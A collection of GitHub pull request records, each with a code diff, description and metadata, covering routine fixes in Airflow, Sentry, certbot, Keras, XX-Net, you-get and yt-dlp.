Migrate tests in google/cloud/sensors from unittest to pytest | diff --git a/tests/providers/google/cloud/sensors/test_bigquery.py b/tests/providers/google/cloud/sensors/test_bigquery.py
index c531a70e62a12..1ee469d62802d 100644
--- a/tests/providers/google/cloud/sensors/test_bigquery.py
+++ b/tests/providers/google/cloud/sensors/test_bigquery.py
@@ -16,7 +16,7 @@
# under the License.
from __future__ import annotations
-from unittest import TestCase, mock
+from unittest import mock
import pytest
@@ -37,7 +37,7 @@
TEST_IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestBigqueryTableExistenceSensor(TestCase):
+class TestBigqueryTableExistenceSensor:
@mock.patch("airflow.providers.google.cloud.sensors.bigquery.BigQueryHook")
def test_passing_arguments_to_hook(self, mock_hook):
task = BigQueryTableExistenceSensor(
@@ -64,7 +64,7 @@ def test_passing_arguments_to_hook(self, mock_hook):
)
-class TestBigqueryTablePartitionExistenceSensor(TestCase):
+class TestBigqueryTablePartitionExistenceSensor:
@mock.patch("airflow.providers.google.cloud.sensors.bigquery.BigQueryHook")
def test_passing_arguments_to_hook(self, mock_hook):
task = BigQueryTablePartitionExistenceSensor(
@@ -104,7 +104,7 @@ def context():
yield context
-class TestBigQueryTableExistenceAsyncSensor(TestCase):
+class TestBigQueryTableExistenceAsyncSensor:
def test_big_query_table_existence_sensor_async(self):
"""
Asserts that a task is deferred and a BigQueryTableExistenceTrigger will be fired
diff --git a/tests/providers/google/cloud/sensors/test_bigquery_dts.py b/tests/providers/google/cloud/sensors/test_bigquery_dts.py
index 270f15a7bf393..c4ea153001c4e 100644
--- a/tests/providers/google/cloud/sensors/test_bigquery_dts.py
+++ b/tests/providers/google/cloud/sensors/test_bigquery_dts.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from unittest.mock import MagicMock as MM
@@ -35,7 +34,7 @@
GCP_CONN_ID = "google_cloud_default"
-class TestBigQueryDataTransferServiceTransferRunSensor(unittest.TestCase):
+class TestBigQueryDataTransferServiceTransferRunSensor:
@mock.patch(
"airflow.providers.google.cloud.sensors.bigquery_dts.BiqQueryDataTransferServiceHook",
return_value=MM(get_transfer_run=MM(return_value=MM(state=TransferState.FAILED))),
diff --git a/tests/providers/google/cloud/sensors/test_cloud_composer.py b/tests/providers/google/cloud/sensors/test_cloud_composer.py
index c00521c1ebe85..8062da44b9b9a 100644
--- a/tests/providers/google/cloud/sensors/test_cloud_composer.py
+++ b/tests/providers/google/cloud/sensors/test_cloud_composer.py
@@ -17,7 +17,7 @@
from __future__ import annotations
-from unittest import TestCase, mock
+from unittest import mock
import pytest
@@ -30,7 +30,7 @@
TEST_REGION = "region"
-class TestCloudComposerEnvironmentSensor(TestCase):
+class TestCloudComposerEnvironmentSensor:
def test_cloud_composer_existence_sensor_async(self):
"""
Asserts that a task is deferred and a CloudComposerExecutionTrigger will be fired
diff --git a/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py b/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
index 86db78c3045e8..cbf348b324b67 100644
--- a/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
+++ b/tests/providers/google/cloud/sensors/test_cloud_storage_transfer_service.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from parameterized import parameterized
@@ -35,7 +34,7 @@
JOB_NAME = "job-name/123"
-class TestGcpStorageTransferOperationWaitForJobStatusSensor(unittest.TestCase):
+class TestGcpStorageTransferOperationWaitForJobStatusSensor:
@mock.patch(
"airflow.providers.google.cloud.sensors.cloud_storage_transfer_service.CloudDataTransferServiceHook"
)
diff --git a/tests/providers/google/cloud/sensors/test_dataflow.py b/tests/providers/google/cloud/sensors/test_dataflow.py
index 07043b9753ab3..54de120a30fe9 100644
--- a/tests/providers/google/cloud/sensors/test_dataflow.py
+++ b/tests/providers/google/cloud/sensors/test_dataflow.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -41,7 +40,7 @@
TEST_IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestDataflowJobStatusSensor(unittest.TestCase):
+class TestDataflowJobStatusSensor:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_DONE, DataflowJobStatus.JOB_STATE_DONE, True),
@@ -107,7 +106,7 @@ def test_poke_raise_exception(self, mock_hook):
)
-class TestDataflowJobMetricsSensor(unittest.TestCase):
+class TestDataflowJobMetricsSensor:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
@@ -149,7 +148,7 @@ def test_poke(self, job_current_state, fail_on_terminal_state, mock_hook):
callback.assert_called_once_with(mock_fetch_job_metrics_by_id.return_value.__getitem__.return_value)
-class DataflowJobMessagesSensorTest(unittest.TestCase):
+class DataflowJobMessagesSensorTest:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
@@ -225,7 +224,7 @@ def test_poke_raise_exception(self, mock_hook):
callback.assert_not_called()
-class DataflowJobAutoScalingEventsSensorTest(unittest.TestCase):
+class DataflowJobAutoScalingEventsSensorTest:
@parameterized.expand(
[
(DataflowJobStatus.JOB_STATE_RUNNING, True),
diff --git a/tests/providers/google/cloud/sensors/test_datafusion.py b/tests/providers/google/cloud/sensors/test_datafusion.py
index 195f02068131d..16ebb0d71f9b6 100644
--- a/tests/providers/google/cloud/sensors/test_datafusion.py
+++ b/tests/providers/google/cloud/sensors/test_datafusion.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -39,7 +38,7 @@
FAILURE_STATUSES = {"FAILED"}
-class TestCloudDataFusionPipelineStateSensor(unittest.TestCase):
+class TestCloudDataFusionPipelineStateSensor:
@parameterized.expand(
[
(PipelineStates.COMPLETED, PipelineStates.COMPLETED, True),
diff --git a/tests/providers/google/cloud/sensors/test_dataplex.py b/tests/providers/google/cloud/sensors/test_dataplex.py
index dc409bc43a092..9871a2f4c5d39 100644
--- a/tests/providers/google/cloud/sensors/test_dataplex.py
+++ b/tests/providers/google/cloud/sensors/test_dataplex.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -40,7 +39,7 @@
IMPERSONATION_CHAIN = ["ACCOUNT_1", "ACCOUNT_2", "ACCOUNT_3"]
-class TestDataplexTaskStateSensor(unittest.TestCase):
+class TestDataplexTaskStateSensor:
def create_task(self, state: int):
task = mock.Mock()
task.state = state
diff --git a/tests/providers/google/cloud/sensors/test_dataproc.py b/tests/providers/google/cloud/sensors/test_dataproc.py
index d05d9f62b587c..61d6d55c919ba 100644
--- a/tests/providers/google/cloud/sensors/test_dataproc.py
+++ b/tests/providers/google/cloud/sensors/test_dataproc.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
from unittest.mock import Mock
@@ -39,7 +38,7 @@
TIMEOUT = 120
-class TestDataprocJobSensor(unittest.TestCase):
+class TestDataprocJobSensor:
def create_job(self, state: int):
job = mock.Mock()
job.status = mock.Mock()
@@ -186,7 +185,7 @@ def test_wait_timeout_raise_exception(self, mock_hook):
sensor.poke(context={})
-class TestDataprocBatchSensor(unittest.TestCase):
+class TestDataprocBatchSensor:
def create_batch(self, state: int):
batch = mock.Mock()
batch.state = mock.Mock()
diff --git a/tests/providers/google/cloud/sensors/test_gcs.py b/tests/providers/google/cloud/sensors/test_gcs.py
index bf586dfe1c02f..642461f63a635 100644
--- a/tests/providers/google/cloud/sensors/test_gcs.py
+++ b/tests/providers/google/cloud/sensors/test_gcs.py
@@ -18,7 +18,7 @@
from __future__ import annotations
from datetime import datetime, timedelta, timezone
-from unittest import TestCase, mock
+from unittest import mock
import pendulum
import pytest
@@ -75,7 +75,7 @@ def next_time_side_effect():
mock_time = mock.Mock(side_effect=next_time_side_effect)
-class TestGoogleCloudStorageObjectSensor(TestCase):
+class TestGoogleCloudStorageObjectSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_argument_to_hook(self, mock_hook):
task = GCSObjectExistenceSensor(
@@ -99,7 +99,7 @@ def test_should_pass_argument_to_hook(self, mock_hook):
mock_hook.return_value.exists.assert_called_once_with(TEST_BUCKET, TEST_OBJECT, DEFAULT_RETRY)
-class TestGoogleCloudStorageObjectSensorAsync(TestCase):
+class TestGoogleCloudStorageObjectSensorAsync:
def test_gcs_object_existence_sensor_async(self):
"""
Asserts that a task is deferred and a GCSBlobTrigger will be fired
@@ -139,7 +139,7 @@ def test_gcs_object_existence_sensor_async_execute_complete(self):
mock_log_info.assert_called_with("File %s was found in bucket %s.", TEST_OBJECT, TEST_BUCKET)
-class TestTsFunction(TestCase):
+class TestTsFunction:
def test_should_support_datetime(self):
context = {
"dag": DAG(dag_id=TEST_DAG_ID, schedule=timedelta(days=5)),
@@ -159,7 +159,7 @@ def test_should_support_cron(self):
assert pendulum.instance(datetime(2019, 2, 24)).isoformat() == result.isoformat()
-class TestGoogleCloudStorageObjectUpdatedSensor(TestCase):
+class TestGoogleCloudStorageObjectUpdatedSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_argument_to_hook(self, mock_hook):
task = GCSObjectUpdateSensor(
@@ -182,7 +182,7 @@ def test_should_pass_argument_to_hook(self, mock_hook):
assert result is True
-class TestGoogleCloudStoragePrefixSensor(TestCase):
+class TestGoogleCloudStoragePrefixSensor:
@mock.patch("airflow.providers.google.cloud.sensors.gcs.GCSHook")
def test_should_pass_arguments_to_hook(self, mock_hook):
task = GCSObjectsWithPrefixExistenceSensor(
@@ -253,8 +253,8 @@ def test_execute_timeout(self, mock_hook):
mock_hook.return_value.list.assert_called_once_with(TEST_BUCKET, prefix=TEST_PREFIX)
-class TestGCSUploadSessionCompleteSensor(TestCase):
- def setUp(self):
+class TestGCSUploadSessionCompleteSensor:
+ def setup_method(self):
self.dag = DAG(
TEST_DAG_ID + "test_schedule_dag_once",
schedule="@once",
diff --git a/tests/providers/google/cloud/sensors/test_looker.py b/tests/providers/google/cloud/sensors/test_looker.py
index ceaf3c8ea98d2..567340f0864d6 100644
--- a/tests/providers/google/cloud/sensors/test_looker.py
+++ b/tests/providers/google/cloud/sensors/test_looker.py
@@ -16,7 +16,6 @@
# under the License.
from __future__ import annotations
-import unittest
from unittest import mock
import pytest
@@ -33,7 +32,7 @@
TEST_JOB_ID = "123"
-class TestLookerCheckPdtBuildSensor(unittest.TestCase):
+class TestLookerCheckPdtBuildSensor:
@mock.patch(SENSOR_PATH.format("LookerHook"))
def test_done(self, mock_hook):
mock_hook.return_value.pdt_build_status.return_value = {"status": JobStatus.DONE.value}
diff --git a/tests/providers/google/cloud/sensors/test_pubsub.py b/tests/providers/google/cloud/sensors/test_pubsub.py
index cc4191e0ee6c2..952758578c3e7 100644
--- a/tests/providers/google/cloud/sensors/test_pubsub.py
+++ b/tests/providers/google/cloud/sensors/test_pubsub.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from typing import Any
from unittest import mock
@@ -32,7 +31,7 @@
TEST_SUBSCRIPTION = "test-subscription"
-class TestPubSubPullSensor(unittest.TestCase):
+class TestPubSubPullSensor:
def _generate_messages(self, count):
return [
ReceivedMessage(
diff --git a/tests/providers/google/cloud/sensors/test_tasks.py b/tests/providers/google/cloud/sensors/test_tasks.py
index a3a08e26cdc31..59356ce9e6127 100644
--- a/tests/providers/google/cloud/sensors/test_tasks.py
+++ b/tests/providers/google/cloud/sensors/test_tasks.py
@@ -17,7 +17,6 @@
# under the License.
from __future__ import annotations
-import unittest
from typing import Any
from unittest import mock
@@ -35,7 +34,7 @@
FULL_TASK_PATH = "projects/test-project/locations/asia-east2/queues/test-queue/tasks/test-task"
-class TestCloudTasksEmptySensor(unittest.TestCase):
+class TestCloudTasksEmptySensor:
@mock.patch("airflow.providers.google.cloud.sensors.tasks.CloudTasksHook")
def test_queue_empty(self, mock_hook):
| This change removes dependencies on unittest.TestCase from google/cloud/sensors package. The use of unittest in this package is now limited to only unittest.mock which is fine acc to the original issue.
Tested using `breeze testing tests --test-type "Providers[google]"`
related #29305
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of an existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code changes, an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvement+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in a newsfragment file, named `{pr_number}.significant.rst` or `{issue_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
| https://api.github.com/repos/apache/airflow/pulls/29642 | 2023-02-20T17:26:05Z | 2023-02-27T16:23:10Z | 2023-02-27T16:23:10Z | 2023-02-28T08:42:07Z | 3,182 | apache/airflow | 14,642 |
fix(groups): Avoid pickling GroupHash query set | diff --git a/src/sentry/api/endpoints/group_hashes.py b/src/sentry/api/endpoints/group_hashes.py
index 30afc97bcf9c3..95e358c70f0d3 100644
--- a/src/sentry/api/endpoints/group_hashes.py
+++ b/src/sentry/api/endpoints/group_hashes.py
@@ -50,7 +50,7 @@ def delete(self, request: Request, group) -> Response:
if id_list is None:
return Response()
- hash_list = (
+ hash_list = list(
GroupHash.objects.filter(project_id=group.project_id, group=group.id, hash__in=id_list)
.exclude(state=GroupHash.State.LOCKED_IN_MIGRATION)
.values_list("hash", flat=True)
| Evaluate the GroupHash query earlier. This avoids problems (see #36426) associated with pickling the QuerySet object when it's passed to `unmerge.delay`:
https://github.com/getsentry/sentry/blob/54ad1695c0e2cf570852a76ef679962a25d30942/src/sentry/api/endpoints/group_hashes.py#L61-L63
I don't think this causes any performance problems unless (for some reason I'm not seeing) it's especially important not to execute the query until after the delay, in which case I think we're already executing it on [line 58](https://github.com/getsentry/sentry/blob/54ad1695c0e2cf570852a76ef679962a25d30942/src/sentry/api/endpoints/group_hashes.py#L58). | https://api.github.com/repos/getsentry/sentry/pulls/37835 | 2022-08-15T22:24:49Z | 2022-08-16T22:19:50Z | 2022-08-16T22:19:50Z | 2022-09-01T00:02:16Z | 170 | getsentry/sentry | 44,490 |
Fixed a pair of typos in docstrings | diff --git a/acme/acme/jose/json_util.py b/acme/acme/jose/json_util.py
index 7b95e3fce4d..977a0662266 100644
--- a/acme/acme/jose/json_util.py
+++ b/acme/acme/jose/json_util.py
@@ -226,7 +226,7 @@ def encode(self, name):
:param str name: Name of the field to be encoded.
- :raises erors.SerializationError: if field cannot be serialized
+ :raises errors.SerializationError: if field cannot be serialized
:raises errors.Error: if field could not be found
"""
diff --git a/acme/acme/jose/util.py b/acme/acme/jose/util.py
index ab3606efc8a..600077b2016 100644
--- a/acme/acme/jose/util.py
+++ b/acme/acme/jose/util.py
@@ -130,7 +130,7 @@ class ImmutableMap(collections.Mapping, collections.Hashable):
"""Immutable key to value mapping with attribute access."""
__slots__ = ()
- """Must be overriden in subclasses."""
+ """Must be overridden in subclasses."""
def __init__(self, **kwargs):
if set(kwargs) != set(self.__slots__):
| https://api.github.com/repos/certbot/certbot/pulls/2073 | 2016-01-03T19:37:21Z | 2016-01-05T23:02:19Z | 2016-01-05T23:02:19Z | 2016-05-06T19:21:21Z | 289 | certbot/certbot | 2,642 |
|
Ignore hidden folders for image_dataset_from_directory | diff --git a/keras/utils/dataset_utils.py b/keras/utils/dataset_utils.py
index 35d234d6255..487a684454f 100644
--- a/keras/utils/dataset_utils.py
+++ b/keras/utils/dataset_utils.py
@@ -541,9 +541,10 @@ def index_directory(
subdirs = []
for subdir in sorted(tf.io.gfile.listdir(directory)):
if tf.io.gfile.isdir(tf.io.gfile.join(directory, subdir)):
- if subdir.endswith("/"):
- subdir = subdir[:-1]
- subdirs.append(subdir)
+ if not subdir.startswith("."):
+ if subdir.endswith("/"):
+ subdir = subdir[:-1]
+ subdirs.append(subdir)
if not class_names:
class_names = subdirs
else:
| Ignore hidden folders for image_dataset_from_directory like .git .ipynb etc.
Fixes: https://github.com/keras-team/tf-keras/issues/187 | https://api.github.com/repos/keras-team/keras/pulls/18177 | 2023-05-30T23:14:42Z | 2023-06-30T18:36:42Z | 2023-06-30T18:36:42Z | 2024-02-01T22:32:09Z | 180 | keras-team/keras | 47,007 |
精简部署 bat 传输全部参数的方法 | diff --git a/code/default/gae_proxy/server/uploader.bat b/code/default/gae_proxy/server/uploader.bat
index 054448f945..ba5c8d4d19 100644
--- a/code/default/gae_proxy/server/uploader.bat
+++ b/code/default/gae_proxy/server/uploader.bat
@@ -1 +1 @@
-..\..\python27\1.0\python.exe uploader.py %1 %2 %3 %4 %5 %6 %7 %8 %9
+..\..\python27\1.0\python.exe uploader.py %*
| 这样可以保证所有参数都被传输到 py 脚本里。
另外我这里部署也有问题(https://github.com/XX-net/XX-Net/issues/3398) - -
根本就没弹出授权网页来。
```
*****\XX-Net\code\default\gae_proxy\server>uploader.bat xxnet-1 -password 123123 -debug -xxx
*****\XX-Net\code\default\gae_proxy\server>..\..\python27\1.0\python.exe uploader.py xxnet-1 -password 123123 -debug -xxx
2016-05-16 11:39:57,901 - root - INFO - use rc4_password: 123123
2016-05-16 11:39:57,901 - root - INFO - enable debug logging
2016-05-16 11:39:57,901 - root - INFO - unknow argv: -xxx
2016-05-16 11:39:57,901 - root - INFO - set proxy to http://127.0.0.1:8087
2016-05-16 11:39:57,901 - root - INFO - ============ Begin upload ============
2016-05-16 11:39:57,901 - root - INFO - appid:xxnet-1
11:39 AM Application: xxnet-1
11:39 AM Host: appengine.google.com
11:39 AM Rolling back the update.
2016-05-16 11:39:57,938 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:39:57,938 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:39:57,938 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:39:59,355 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:39:59,355 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:00 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
11:39 AM Application: xxnet-1
11:39 AM Host: appengine.google.com
11:39 AM Rolling back the update.
2016-05-16 11:39:59,437 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:39:59,438 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:39:59,440 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:40:00,457 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:40:00,457 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:01 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
11:40 AM Application: xxnet-1
11:40 AM Host: appengine.google.com
11:40 AM Rolling back the update.
2016-05-16 11:40:00,539 - root - INFO - Send: /api/appversion/rollback, params={'version': '1', 'app_id': 'xxnet-1'}
2016-05-16 11:40:00,542 - google.appengine.tools.appengine_rpc - DEBUG - _Authenticate skipped auth; needs_auth=False
2016-05-16 11:40:00,543 - google.appengine.tools.appengine_rpc - DEBUG - Sending request to https://appengine.google.com/api/appversion/rollback?app_id=xxnet-1&force_rollback=0&version=1 headers={'X-appcfg-api-version': '1', 'content-length': '0', 'Content-Type': 'application/octet-stream'} body=
2016-05-16 11:40:01,441 - google.appengine.tools.appengine_rpc - DEBUG - Got http error 404.
2016-05-16 11:40:01,441 - google.appengine.tools.appengine_rpc - DEBUG - Unexpected results: {'date': 'Mon, 16 May 2016 03:40:02 GMT', 'status': '404', 'content-length': '1584', 'content-type': 'text/html; charset=UTF-8'}
Error 404: --- begin server output ---
<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}
</style>
<a href=//www.google.com/><span id=logo aria-label=Google></span></a>
<p><b>404.</b> <ins>That鈥檚 an error.</ins>
<p>The requested URL <code>/api/appversion/rollback</code> was not found on this server. <ins>That鈥檚 all we know.</ins>
--- end server output ---
2016-05-16 11:40:01,457 - root - INFO - =======================
2016-05-16 11:40:01,473 - root - INFO - Deploy failed appid list:
2016-05-16 11:40:01,473 - root - INFO - - xxnet-1
2016-05-16 11:40:01,473 - root - INFO - == END ==
```
| https://api.github.com/repos/XX-net/XX-Net/pulls/3401 | 2016-05-16T03:43:36Z | 2016-05-16T06:14:43Z | 2016-05-16T06:14:43Z | 2016-05-16T07:44:39Z | 123 | XX-net/XX-Net | 17,360 |
Add support for Bandcamp | diff --git a/src/you_get/common.py b/src/you_get/common.py
index e30b077cca..d8c5fa246d 100755
--- a/src/you_get/common.py
+++ b/src/you_get/common.py
@@ -1016,6 +1016,7 @@ def url_to_module(url):
alive,
archive,
baidu,
+ bandcamp,
baomihua,
bilibili,
blip,
@@ -1098,6 +1099,7 @@ def url_to_module(url):
'acfun': acfun,
'archive': archive,
'baidu': baidu,
+ 'bandcamp': bandcamp,
'baomihua': baomihua,
'bilibili': bilibili,
'blip': blip,
diff --git a/src/you_get/extractors/__init__.py b/src/you_get/extractors/__init__.py
index e460772b57..099c8dcfd4 100755
--- a/src/you_get/extractors/__init__.py
+++ b/src/you_get/extractors/__init__.py
@@ -4,6 +4,7 @@
from .alive import *
from .archive import *
from .baidu import *
+from .bandcamp import *
from .bilibili import *
from .blip import *
from .catfun import *
diff --git a/src/you_get/extractors/bandcamp.py b/src/you_get/extractors/bandcamp.py
new file mode 100644
index 0000000000..de21a590d6
--- /dev/null
+++ b/src/you_get/extractors/bandcamp.py
@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+
+__all__ = ['bandcamp_download']
+
+from ..common import *
+
+def bandcamp_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
+ html = get_html(url)
+ trackinfo = json.loads(r1(r'(\[{"video_poster_url".*}\]),', html))
+ for track in trackinfo:
+ track_num = track['track_num']
+ title = '%s. %s' % (track_num, track['title'])
+ file_url = 'http:' + track['file']['mp3-128']
+ mime, ext, size = url_info(file_url)
+
+ print_info(site_info, title, mime, size)
+ if not info_only:
+ download_urls([file_url], title, ext, size, output_dir, merge=merge)
+
+site_info = "Bandcamp.com"
+download = bandcamp_download
+download_playlist = bandcamp_download
| Example links:
- http://flamingstream.bandcamp.com/track/zombie-massacre (single track)
- https://ninetreasuresband.bandcamp.com/album/arvan-ald-guulin-honshoor (album / playlist)
<!-- Reviewable:start -->
[<img src="https://reviewable.io/review_button.png" height=40 alt="Review on Reviewable"/>](https://reviewable.io/reviews/soimort/you-get/707)
<!-- Reviewable:end -->
| https://api.github.com/repos/soimort/you-get/pulls/707 | 2015-10-18T03:14:03Z | 2015-10-18T03:24:36Z | 2015-10-18T03:24:36Z | 2015-10-18T03:24:57Z | 598 | soimort/you-get | 21,346 |
[rh/urllib] Simplify gzip decoding | diff --git a/yt_dlp/networking/_urllib.py b/yt_dlp/networking/_urllib.py
index 2c5f09872af..1ff7ccc6a6e 100644
--- a/yt_dlp/networking/_urllib.py
+++ b/yt_dlp/networking/_urllib.py
@@ -1,7 +1,6 @@
from __future__ import annotations
import functools
-import gzip
import http.client
import io
import socket
@@ -154,20 +153,9 @@ def brotli(data):
@staticmethod
def gz(data):
- gz = gzip.GzipFile(fileobj=io.BytesIO(data), mode='rb')
- try:
- return gz.read()
- except OSError as original_oserror:
- # There may be junk add the end of the file
- # See http://stackoverflow.com/q/4928560/35070 for details
- for i in range(1, 1024):
- try:
- gz = gzip.GzipFile(fileobj=io.BytesIO(data[:-i]), mode='rb')
- return gz.read()
- except OSError:
- continue
- else:
- raise original_oserror
+ # There may be junk added the end of the file
+ # We ignore it by only ever decoding a single gzip payload
+ return zlib.decompress(data, wbits=zlib.MAX_WBITS | 16)
def http_request(self, req):
# According to RFC 3986, URLs can not contain non-ASCII characters, however this is not
| **IMPORTANT**: PRs without the template will be CLOSED
### Description of your *pull request* and other information
<!--
Explanation of your *pull request* in arbitrary form goes here. Please **make sure the description explains the purpose and effect** of your *pull request* and is worded well enough to be understood. Provide as much **context and examples** as possible
-->
This PR removes the try and fail approach for decoding gzip compressed data. The old way tried to decode it using `GzipFile`, which however failed for trailing data since it tried to decode as a new file.
Instead we can use the `zlib.decompress` method, which will only ever try and decode a single data stream, ignoring the trailing data.
Refs:
- [`gzip.decompress`](https://docs.python.org/3/library/gzip.html#gzip.decompress)
- When the data is certain to contain only one member the [zlib.decompress()](https://docs.python.org/3/library/zlib.html#zlib.decompress) function with *wbits* set to 31 is faster.
